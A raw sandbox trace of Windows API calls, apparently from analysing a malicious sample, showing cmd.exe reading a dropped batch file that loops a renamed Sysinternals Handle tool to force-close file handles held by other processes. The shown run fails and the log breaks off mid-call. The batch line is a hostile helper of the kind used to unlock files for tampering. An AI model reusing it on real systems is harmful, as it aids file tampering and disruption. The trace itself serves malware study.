lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", nBufferLength=0x104, lpBuffer=0x5eecc4, lpFilePart=0x5eecbc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpFilePart=0x5eecbc*=0x0) returned 0x1e [0284.769] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0284.769] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x5eea40 | out: lpFindFileData=0x5eea40) returned 0x76cb90 [0284.769] FindClose (in: hFindFile=0x76cb90 | out: hFindFile=0x76cb90) returned 1 [0284.769] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x5eea40 | out: lpFindFileData=0x5eea40) returned 0x76cb90 [0284.769] FindClose (in: hFindFile=0x76cb90 | out: hFindFile=0x76cb90) returned 1 [0284.769] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0284.769] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x5eea40 | out: lpFindFileData=0x5eea40) returned 0x76cb90 [0284.769] FindClose (in: hFindFile=0x76cb90 | out: hFindFile=0x76cb90) returned 1 [0284.769] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0284.770] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0284.770] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0284.770] GetEnvironmentStringsW () returned 0x76b300* [0284.770] FreeEnvironmentStringsA (penv="=") returned 1 [0284.770] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0284.770] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.770] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0284.869] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.869] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0284.928] _get_osfhandle (_FileHandle=0) returned 0x38 [0284.928] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0284.958] SetConsoleInputExeNameW () returned 0x1 [0284.958] GetConsoleOutputCP () returned 0x1b5 [0284.965] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0284.965] SetThreadUILanguage (LangId=0x0) returned 0x409 [0284.978] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x5ef5b4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0284.978] _open_osfhandle (_OSFileHandle=0xb0, _Flags=8) returned 3 [0284.979] _get_osfhandle (_FileHandle=3) returned 0xb0 [0284.979] SetFilePointer (in: hFile=0xb0, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0284.979] _get_osfhandle (_FileHandle=3) returned 0xb0 [0284.979] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0284.979] ReadFile (in: hFile=0xb0, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x5ef584, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x5ef584*=0x94, lpOverlapped=0x0) returned 1 [0284.979] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=148, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`vIDhS3md.exe -accepteula %FN% -nobanner`) DO (vIDhS3md.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0284.979] _get_osfhandle (_FileHandle=3) returned 0xb0 [0284.979] GetFileType (hFile=0xb0) returned 0x1 [0284.979] _get_osfhandle (_FileHandle=3) returned 0xb0 [0284.979] SetFilePointer (in: hFile=0xb0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0284.980] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="\"Seyes.jtp\"") returned 0xb [0284.980] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0284.980] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0284.980] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0284.980] _wcsicmp (_String1="/L", _String2="/F") returned 6 [0284.980] _wcsicmp (_String1="/D", _String2="/F") returned -2 [0284.980] _wcsicmp (_String1="/F", _String2="/F") returned 0 [0284.983] _wcsicmp (_String1="/L", _String2="%I") returned 10 [0284.983] _wcsicmp (_String1="/D", _String2="%I") returned 10 [0284.983] _wcsicmp (_String1="/F", _String2="%I") returned 10 [0284.983] _wcsicmp (_String1="/R", _String2="%I") returned 10 [0284.983] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0284.983] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0284.984] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0284.984] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0284.984] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0284.984] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0284.984] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0284.984] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0284.985] _tell (_FileHandle=3) returned 226 [0284.985] _close (_FileHandle=3) returned 0 [0284.985] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x5ef348 | out: _Buffer="\r\n") returned 2 [0284.985] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.985] GetFileType (hFile=0x3c) returned 0x2 [0284.985] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0284.985] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef320 | out: lpMode=0x5ef320) returned 1 [0284.987] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.987] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef338, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef338*=0x2) returned 1 [0284.989] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0284.989] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0284.989] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x5ef344 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0284.989] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x5ef344 | out: _Buffer=">") returned 1 [0284.989] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.989] GetFileType (hFile=0x3c) returned 0x2 [0284.989] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0284.989] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef324 | out: lpMode=0x5ef324) returned 1 [0284.993] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.993] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x5ef33c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x5ef33c*=0x1e) returned 1 [0285.270] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x5ef5e4 | out: _Buffer="FOR") returned 3 [0285.270] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.270] GetFileType (hFile=0x3c) returned 0x2 [0285.270] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0285.270] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5bc | out: lpMode=0x5ef5bc) returned 1 [0285.616] _get_osfhandle (_FileHandle=1) returned 0x3c [0285.616] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x5ef5d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef5d4*=0x3) returned 1 [0286.319] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x5ef5e4 | out: _Buffer=" /F") returned 3 [0286.319] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.319] GetFileType (hFile=0x3c) returned 0x2 [0286.319] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0286.319] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5bc | out: lpMode=0x5ef5bc) returned 1 [0286.858] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.858] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x5ef5d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef5d4*=0x3) returned 1 [0287.041] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x5ef5e4 | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0287.041] _get_osfhandle (_FileHandle=1) returned 0x3c [0287.041] GetFileType (hFile=0x3c) returned 0x2 [0287.041] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0287.041] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5bc | out: lpMode=0x5ef5bc) returned 1 [0287.777] _get_osfhandle (_FileHandle=1) returned 0x3c [0287.777] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x5ef5d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef5d4*=0x20) returned 1 [0288.379] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x5ef5e4 | out: _Buffer=" %I IN ") returned 7 [0288.379] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.379] GetFileType (hFile=0x3c) returned 0x2 [0288.379] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0288.379] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5bc | out: lpMode=0x5ef5bc) returned 1 [0288.561] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.561] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x5ef5d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef5d4*=0x7) returned 1 [0288.939] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x5ef5e0 | out: _Buffer="(`vIDhS3md.exe -accepteula \"Seyes.jtp\" -nobanner`) DO ") returned 54 [0288.939] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.939] GetFileType (hFile=0x3c) returned 0x2 [0288.939] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0288.939] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5b8 | out: lpMode=0x5ef5b8) returned 1 [0289.898] _get_osfhandle (_FileHandle=1) returned 0x3c [0289.898] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x5ef5d0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef5d0*=0x36) returned 1 [0290.270] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.270] GetFileType (hFile=0x3c) returned 0x2 [0290.270] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0290.270] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5c4 | out: lpMode=0x5ef5c4) returned 1 [0290.345] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.345] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5ef5dc, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0x5ef5dc*=0x1) returned 1 [0290.384] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.384] GetFileType (hFile=0x3c) returned 0x2 [0290.384] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0290.384] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5b4 | out: lpMode=0x5ef5b4) returned 1 [0290.611] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.611] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x76caa0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x5ef5cc, lpReserved=0x0 | out: lpBuffer=0x76caa0*, lpNumberOfCharsWritten=0x5ef5cc*=0xc) returned 1 [0290.643] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x5ef5d4 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0290.643] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.643] GetFileType (hFile=0x3c) returned 0x2 [0290.643] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0290.643] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5ac | out: lpMode=0x5ef5ac) returned 1 [0290.658] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.658] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x5ef5c4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef5c4*=0x26) returned 1 [0290.860] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x5ef5e4 | out: _Buffer=") ") returned 2 [0290.860] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.860] GetFileType (hFile=0x3c) returned 0x2 [0290.860] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0290.860] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5bc | out: lpMode=0x5ef5bc) returned 1 [0290.953] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.953] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef5d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef5d4*=0x2) returned 1 [0291.225] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x5ef5f8 | out: _Buffer="\r\n") returned 2 [0291.225] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.225] GetFileType (hFile=0x3c) returned 0x2 [0291.225] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0291.225] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5d0 | out: lpMode=0x5ef5d0) returned 1 [0291.273] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.273] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef5e8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef5e8*=0x2) returned 1 [0291.628] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0291.628] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0291.628] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0291.628] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0291.628] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0291.628] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0291.628] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0291.628] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x5ef520, _Radix=0 | out: _EndPtr=0x5ef520*=",6 delims=: \"") returned 3 [0291.628] wcstol (in: _String="6 delims=: \"", _EndPtr=0x5ef520, _Radix=0 | out: _EndPtr=0x5ef520*=" delims=: \"") returned 6 [0291.628] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0291.628] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0291.628] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0291.628] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0291.629] _wpopen (_Command="vIDhS3md.exe -accepteula \"Seyes.jtp\" -nobanner", _Mode="rb") returned 0x77981268 [0291.640] feof (_File=0x77981268) returned 0 [0291.640] ferror (_File=0x77981268) returned 0 [0291.640] fgets (in: _Buf=0x76cb08, _MaxCount=256, _File=0x77981268 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77981268) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0295.571] feof (_File=0x77981268) returned 0 [0295.571] ferror (_File=0x77981268) returned 0 [0295.571] fgets (in: _Buf=0x76a646, _MaxCount=442, _File=0x77981268 | out: _Buf="\r\r\n", _File=0x77981268) returned="\r\r\n" [0295.571] feof (_File=0x77981268) returned 0 [0295.571] ferror (_File=0x77981268) returned 0 [0295.571] fgets (in: _Buf=0x76f999, _MaxCount=695, _File=0x77981268 | out: _Buf="", _File=0x77981268) returned 0x0 [0296.684] _pclose (in: _File=0x77981268 | out: _File=0x77981268) returned 1 [0296.685] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x76f999, cbMultiByte=73, lpWideCharStr=0x76f950, cchWideChar=73 | out: lpWideCharStr="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n\r\r\n") returned 73 [0296.685] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x5ef200 | out: _Buffer="\r\n") returned 2 [0296.685] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.685] GetFileType (hFile=0x3c) returned 0x2 [0296.685] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.685] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef1d8 | out: lpMode=0x5ef1d8) returned 1 [0296.781] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.781] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef1f0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef1f0*=0x2) returned 1 [0296.781] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0296.781] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x5ef1fc | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0296.781] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x5ef1fc | out: _Buffer=">") returned 1 [0296.781] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.781] GetFileType (hFile=0x3c) returned 0x2 [0296.781] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.781] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef1dc | out: lpMode=0x5ef1dc) returned 1 [0296.781] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.781] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x5ef1f4, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x5ef1f4*=0x1e) returned 1 [0296.782] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.782] GetFileType (hFile=0x3c) returned 0x2 [0296.782] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.782] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef47c | out: lpMode=0x5ef47c) returned 1 [0296.782] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.782] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13d2318*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5ef494, lpReserved=0x0 | out: lpBuffer=0x13d2318*, lpNumberOfCharsWritten=0x5ef494*=0x1) returned 1 [0296.782] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.782] GetFileType (hFile=0x3c) returned 0x2 [0296.782] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.782] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef46c | out: lpMode=0x5ef46c) returned 1 [0296.782] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.782] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x778538*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x5ef484, lpReserved=0x0 | out: lpBuffer=0x778538*, lpNumberOfCharsWritten=0x5ef484*=0xc) returned 1 [0296.783] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x5ef48c | out: _Buffer=" -accepteula -c Run -y -p extract -nobanner ") returned 44 [0296.783] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.783] GetFileType (hFile=0x3c) returned 0x2 [0296.783] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.783] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef464 | out: lpMode=0x5ef464) returned 1 [0296.783] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.783] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x5ef47c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef47c*=0x2c) returned 1 [0296.783] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x5ef49c | out: _Buffer=") ") returned 2 [0296.783] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.783] GetFileType (hFile=0x3c) returned 0x2 [0296.783] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.783] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef474 | out: lpMode=0x5ef474) returned 1 [0296.783] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.783] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef48c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef48c*=0x2) returned 1 [0296.784] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x5ef4b0 | out: _Buffer="\r\n") returned 2 [0296.784] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.784] GetFileType (hFile=0x3c) returned 0x2 [0296.784] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0296.784] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef488 | out: lpMode=0x5ef488) returned 1 [0296.784] _get_osfhandle (_FileHandle=1) returned 0x3c [0296.784] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef4a0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef4a0*=0x2) returned 1 [0296.784] GetConsoleTitleW (in: lpConsoleTitle=0x5eefc8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0296.784] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0296.785] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0296.785] _wcsicmp 